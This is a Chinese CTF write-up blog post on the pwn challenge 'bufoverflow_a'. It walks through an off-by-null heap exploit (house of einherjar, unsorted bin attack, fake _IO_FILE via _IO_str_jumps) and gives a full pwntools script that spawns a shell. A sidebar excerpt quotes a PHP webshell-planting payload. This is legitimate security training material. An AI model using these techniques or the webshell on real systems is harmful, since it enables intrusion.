【攻防世界】bufoverflow_a

最新推荐文章于 2022-01-07 23:03:47 发布
最新推荐文章于 2022-01-07 23:03:47 发布
阅读量259 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/115558418
版权
1.程序逆向

简单的逆向,记一下几个地方:当chunk数大于2时,便使用 calloc 分配并且 free 后会进行填充:
在这里插入图片描述
关于 mallopt 见这里
在这里插入图片描述
漏洞出现在 fill 功能中,存在 off by null。
show 输出遇 0 截断。
在这里插入图片描述

2.漏洞利用&限制条件
  • off by null
  • chunk size 无限制
  • 可以泄漏地址 chunk 只有两个
  • show 遇 ‘\x00’ 截断
  • 可以无限次 edit

    由于能够正常 malloc 的 chunk 有限制,所以要不断的利用前两个块来泄漏地址,off by null 这里使用 house of einherjar 可以返回一个 fake_chunk 地址,该 fake_chunk 在另一个 chunk 中,下一次申请即可形成 chunk overlap,然后通过 unsorted bin attack + libc 2.24 io_attack 完成利用。在 house of einherjar 时要构造好过 unlink 的检测。

首先泄漏 libc 地址:

# leak libc
add(0x80) #0
add(0x80) #1

dele(0)
dele(1)
add(0x80) #0
show()

然后准备 unlink 泄漏 heap_base,因为不能获取其指针数组位置,只能通过 p->fd = p; p->bk=p 来让绕过 unlink 的限制:
在这里插入图片描述在这里插入图片描述
因为 large bin chunk 中的 fd_nextsize 中会残留堆地址,所以我们要通过这里得到堆地址,但是因为show 会 ‘\x00’ 截断,不能直接从 fd 的部分 show。因为 fd_nextsize 在当前 chunk_header + 0x20 处,所以可以在该 chunk 之前布置一个堆块 #0(第一步泄漏 libc 的堆块即是),然后将这两个 chunk 与 top chunk 合并后,先申请一个 size 大于刚刚前面 #0 0x10 的堆块,这样再申请第二个堆块到此处时,原 fd_nextsize 恰为现 fd 的位置,可以 show:

add(0x400) #1
add(0x80) #2

dele(1) #1 -> unsorted bin
add(0x500) #1 unsorted bin -> large bin
dele(1) # consolidate with top chunk

dele(2) # 1,2 -> top_chunk
dele(0) # 0 -> top_chunk
add(0x90) #0
add(0x80) #1
show()

接下来需要通过 off by null + house of einhenjar 构造包含 unsorted bin chunk 的堆块重叠:

dele(0)
dele(1)

# create fake chunk
add(0x208) #0
fake_chunk = 'a'*0x20
fake_chunk += p64(0) + p64(0x1e1)
fake_chunk += p64(heap_base + 0x50) * 2
fake_chunk = fake_chunk.ljust(0x200, '\x00')
fake_chunk += p64(0x1e0)
edit(fake_chunk)

add(0x80) #1
add(0xf0) #2
edit('2'*0xf0)
dele(1)

# 触发后向合并
pad = '1'*0x80 + p64(0x270)
add(0x88) #1
edit(pad)
dele(2) # consolidate 0 1 2

在这里插入图片描述
此时我们还需要一个内层被控制的 unsorted bin chunk,先来构造 0 和 1 正常的 unsorted bin,这里需要复原刚才 #1 的头部和 #2 的头部避免下一步 free 时检查不通过,为了后面不会 calloc 清空和 free 后填充,把 #1 也先 free 掉

add(0x290) #2  split from fake_chunk 
pad = 'a'*0x1d0 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x101) + '\n'
edit(pad)
dele(1)
dele(0)

在这里插入图片描述
在这里插入图片描述
现在 fake_chunk idx = 2,此刻我们的目的就是将 fake_chunk free 进 unsorted bin,然后通过 0x··020 的外层 chunk 控制其 bk,因为如图,fake_chunk 前后的字段被打乱,所以此时要从外层申请的 unsorted bin 中申请一个较大的堆,然后重新伪造 fake_chunk ,需要在 fake_chunk 的末尾腾出位置制造一个填充的 chunk 来绕过检查:

add(0x290) #0  split from normal chunk
pad = 'a'*0x20 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x151) + '\n'
edit(pad)
dele(0)
dele(2) # 此时 size = 0x90
add(0x290) # can control unsortedbin chunk : #2 (size =0x90)

此时已经达成通过外层 chunk 控制内存 unsorted bin chunk 的目的。因为本题 libc 版本为2.24,增加了对 vtable 的检查,这里用 _IO_str_jumps 绕过,再利用 _IO_str_finish 中:
在这里插入图片描述
将 vtable 指向 _IO_str_jumps,把 fp->_s._free_buffer 指向 system 函数,把 fp->_IO_buf_base 指向 /bin/sh 字符串,再伪造一下其他字段即可

fake_file = p64(0) + p64(0x60)
fake_file += p64(0) + p64(IO_list_all_addr - 0x10)
fake_file += p64(0) + p64(1)
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xd8, '\x00')
fake_file += p64(IO_str_jumps_addr - 8)
fake_file += p64(0) + p64(system_addr)

pl = 'a'*0x20
pl += fake_file
pl += '\n'
edit(pl)

最后申请一个 > 0x60 的 chunk 完成利用。

3.完整exp
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from ctypes import *
context.log_level = 'debug'

binary = './bufoverflow_a'
elf = ELF('./bufoverflow_a')
libc = elf.libc
# libc = cdll.LoadLibrary("./libc.so.6")
context.binary = binary

DEBUG = 1
if DEBUG:
	p = process(binary)
else:
	host = "node2.hackingfor.fun"
	port =  39964 
	p = remote(host,port)
if DEBUG == 2:
	host = ""
	port = 0
	user = ""
	passwd = ""
	p = ssh(host,port,user,passwd)

def dbg():
    gdb.attach(p)
    pause()

l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

menu = ">> "

def cmd(i):
	ru(menu)
	sl(str(i))

def add(size):
	cmd(1)
	sla("Size: ", str(size))

def dele(idx):
	cmd(2)
	sla("Index: ", str(idx))

def edit(content):
	cmd(3)
	ru("Content: ")
	se(content)

def show():
	cmd(4)

def get_IO_str_jumps():
	IO_file_jumps_offset = libc.sym['_IO_file_jumps']
	IO_str_underflow_offset = libc.sym['_IO_str_underflow']
	for ref_offset in libc.search(p64(IO_str_underflow_offset)):
		possible_IO_str_jumps_offset = ref_offset - 0x20
		if possible_IO_str_jumps_offset > IO_file_jumps_offset:
			print(possible_IO_str_jumps_offset)
			return possible_IO_str_jumps_offset

add(0x80) #0
add(0x80) #1

dele(0)
add(0x80) #0
show()
libc_base = l64() - libc.sym['__malloc_hook'] - 0x68
info("libc_base", libc_base)
IO_list_all_addr = libc_base + libc.sym['_IO_list_all']
IO_str_jumps_addr = libc_base + get_IO_str_jumps()
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search("/bin/sh").next()
dele(1)

add(0x400) #1
add(0x80) #2

dele(1) #1 -> unsorted bin
add(0x500) #1 unsorted bin -> large bin
dele(1) 

dele(2) # 1,2 -> top_chunk
dele(0) # 0 -> top_chunk
add(0x90) #0
add(0x80) #1
show()
heap_base = u64(p.recvuntil("\n", drop=True).ljust(8, '\x00')) - 0xb0
info("heap_base", heap_base)

dele(0)
dele(1)

# create fake chunk
add(0x208) #0
fake_chunk = 'a'*0x20
fake_chunk += p64(0) + p64(0x1e1)
fake_chunk += p64(heap_base + 0x50) * 2
fake_chunk = fake_chunk.ljust(0x200, '\x00')
fake_chunk += p64(0x1e0)
edit(fake_chunk)

add(0x80) #1
add(0xf0) #2
edit('2'*0xf0)
dele(1)

pad = '1'*0x80 + p64(0x270)
add(0x88) #1
edit(pad)
dele(2) # consolidate 0 1 2

add(0x290) #2  split from fake_chunk 
pad = 'a'*0x1d0 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x101) + '\n'
edit(pad)
dele(1)
dele(0)
dbg()

add(0x290) #0  split from normal chunk
pad = 'a'*0x20 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x151) + '\n'
edit(pad)
dele(0)
dele(2)
add(0x290) # can control unsortedbin #2 size =0x90

fake_file = p64(0) + p64(0x60)
fake_file += p64(0) + p64(IO_list_all_addr - 0x10)
fake_file += p64(0) + p64(1)
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xd8, '\x00')
fake_file += p64(IO_str_jumps_addr - 8)
fake_file += p64(0) + p64(system_addr)

pl = 'a'*0x20
pl += fake_file
pl += '\n'
edit(pl)

add(0x80)

# dbg()

ia()

参考链接

、皮皮鸭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界 pwn 进阶 bufoverflow_a
yongbaoii的博客
03-13 422
保护一片绿。 菜单堆。 alloc delete fill show
攻防世界PWN之bufoverflow_a题解(house of orange in 2.24&house of Einherjar)
seaaseesa的博客
02-19 950
bufoverflow_a 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。 Fill功能存在一个null off by one漏洞 我们每次只能对最后创建的那个堆进...
攻防世界PWN之bufoverflow_b题解
seaaseesa的博客
02-19 759
bufoverflow_b 这题和bufferoverflow_a类似,只是在输入的时候,增加了一个检查 遇到空字符就会截断,这将不利于我们在chunk里伪造数据。 另外增加了一个功能,不过我没有使用到。 遇到’\x00’就会截断,但是我们仍然可以完整的把我们的伪造数据放进去。 比如,我们要在偏移0x30处写一个数据0x0000000000123456,我们先把0x30处的8字节...
攻防世界】bufoverflow_b
weixin_43960998的博客
04-09 153
其他部分与 bufoverflow_a一样,但是 b 中多了一个检查: 这里不能输入空字节,这样的话就不能像 a 中直接布置,这样会破坏掉前面的字段,需要倒着布置。还有一个需要注意的就是,在触发 off by null 时 a 中可以一次性的布置好 pre_size 和 pre_inuse 位,但是在本题中则需要先覆盖 next chunk 的 pre_inuse 位,然后再清理填充的字节,布置 pre_size 位,再触发: # pad = '1'*0x80 + p64(0x270) add(0x88)
攻防世界 pwn 进阶 bufoverflow_b
yongbaoii的博客
03-13 233
跟bufoverflow_b差不多,就是多了个检查。 所以先看看bufoverflow_a 说跟bufoverflow_a差不多是为啥,因为它就是在输入的时候检查多了一项。 这个是bufoverflow_a 这个是bufoverflow_b 这个题会检查我们的输入是不是\x00,意思是会被\x00截断,那么我们在输入数据的时候就会麻烦一些。 那我们怎么去解决这个烦恼,我们这里利用大佬的方法。 在我们向内存中写地址的时候内存中一定会有一些垃圾数据,我们写数据的时候,假如我们要写入一个地址,在内存中小端序
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界-command_execution
m0_62094846的博客
10-24 5668
 ping是Windows、Unix和Linux系统下的一个命令。ping也属于一个通信协议,是TCP/IP协议的一部分。利用“ping”命令可以检查网络是否连通,可以很好地帮助我们分析和判定网络故障。应用格式:Ping空格IP地址。该命令还可以加许多参数使用,具体是键入Ping按回车即可看到详细说明。 作用:它是用来检查网络是否通畅或者网络连接速度的命令。 它所利用的原理是这样的:利用网络上机器IP地址的唯一性,给目标IP地址发送一个数据包,再要求对方返回一个同样大小的数据包来确定两台网络机器是否
攻防世界
jemo的博客
05-23 216
crypto新手区1.base642.Caesra3.Morse4.幂数加密5.Railfence6.不仅仅是morse7.混合编码8.easy_RSA9.easychallenge10.转轮机加密 1.base64 打开附件,用base64,得出flag 2.Caesra 打开附件 很明显是凯撒密码,但是由于不知道位移是多少(也有可能是我猜看不出来),一个一个式,当位移为12时得出flag 3.Morse 打开附件,只有0和1猜想为摩斯密码,把1改为-,把0改为. 用摩斯密码解密后,根据题目提示
buffer overflow-(2)
qq_43481350的博客
07-23 147
Intruction previous article already send a email by C program successfully now we will show how to write bufffer overflow code. Detail code Because the length of data must not exceed 0x200,so we fill with 0x150 A memset(buffer, 0x41, 0x150); sprintf_s(b
攻防世界 blgdel
xiaoqi199915的博客
06-02 1022
攻防世界 blgdel 小白的刷题之路 从0到1 扫描一下目录 发现robots.php 进行访问 发现一个config.txt 打开发现的是源代码 观察代码发现好多正则匹配的原则 和一些过滤的规则 还是没有方向 返回主页面进行查看 发现一个注册和登陆的界面 先随便注册一个账户 点开了头像 发现是一个上传页面 ,猜测是一个上传 上传一个php一句话 提示我们权限不够 审查源代码 看见一个推荐人的信息 没有办法 连续注册了12次!!!!! 发现积分变成了120 此时在上传 发现可以上传 在次上传一个php
攻防世界-wp-CRYPTO-新手区-9-easychallenge
Scorpio_m7
08-20 1155
题目来源: NJUPT_CTF 题目描述: 你们走到了一个冷冷清清的谜题前面,小鱼看着题目给的信息束手无策,丈二和尚摸不着头脑 ,你嘿嘿一笑,拿出来了你随身带着的笔记本电脑,噼里啪啦的敲起来了键盘,清晰的函数逻辑和流程出现在 了电脑屏幕上,你敲敲键盘,更改了几处地方,运行以后答案变出现在了电脑屏幕上。 题目附件: 42aa1a89e3ae48c38e8b713051557020.pyc ](https://adworld.xctf.org.cn/media/task/attachments/42aa1a8
攻防世界--smarty
qq_46263951的博客
01-07 1102
根据题目和页面内容提示,可以知道这里使用的是PHP中的Smarty模板 网上看这个模板存在着模板注入,但是没有找到参数,猜测在请求头 那就有两种可能的注入点: XFF client IP 发现XFF存在注入 测试phpinfo()发现这里禁用了很多函数,并且可访目录也做了限制 使用{if}标签写入一句话木马 {if file_put_contents('/var/www/html/shell.php','<?php eval($_POST[cmd]);')}{/if} ...
攻防世界 gametime
P_Bloomberg的博客
08-09 2161
准备 工具:IDA、x32dbg、010Editor 环境:Windows10 开始 附件是exe可执行文件,在cmd里执行后,发现是一个游戏 玩了一会后,发现规律大概是它出现什么字母,你就要根据下面的规则按下相应的键 's'-->' ' 'x'-->'x' 'm'-->'m' 一开始可能还可以,后来速度快就没法玩,所以动态调试 IDA静态分析 先拖进IDA中,分析main函数 int __cdecl main(int argc, const char **argv, con
攻防世界misc进阶1-10详细教程
weixin_52127082的博客
04-08 578
2.下载好用wireshark打开,输入modbus,追踪流 TCP流 最终答案是sctf{Easy_Modbus}
主席树
lycccccccc的博客
03-01 105
主席树是什么 先思考这样一个问题,给定一段序列,和若干个询问,每次查询区间[L,R]中第k小的数。 挂上模板题:洛谷3834 现在来想一下具体做法,首先我们知道求整个序列的第k大可以用权值线段树(假设已经会了 ),那么我们想如何求[L,R]的呢,我们想如果已经知道了[1,L]和[1,R]这两棵权值线段树是不是就能够得到答案了呢(当然是了),我们还需要用求全局第k小的方法在向下递归的过程中不断从[1...
攻防世界guess_num
最新发布
08-31
攻防世界guess_num是一个题目,它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}",可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值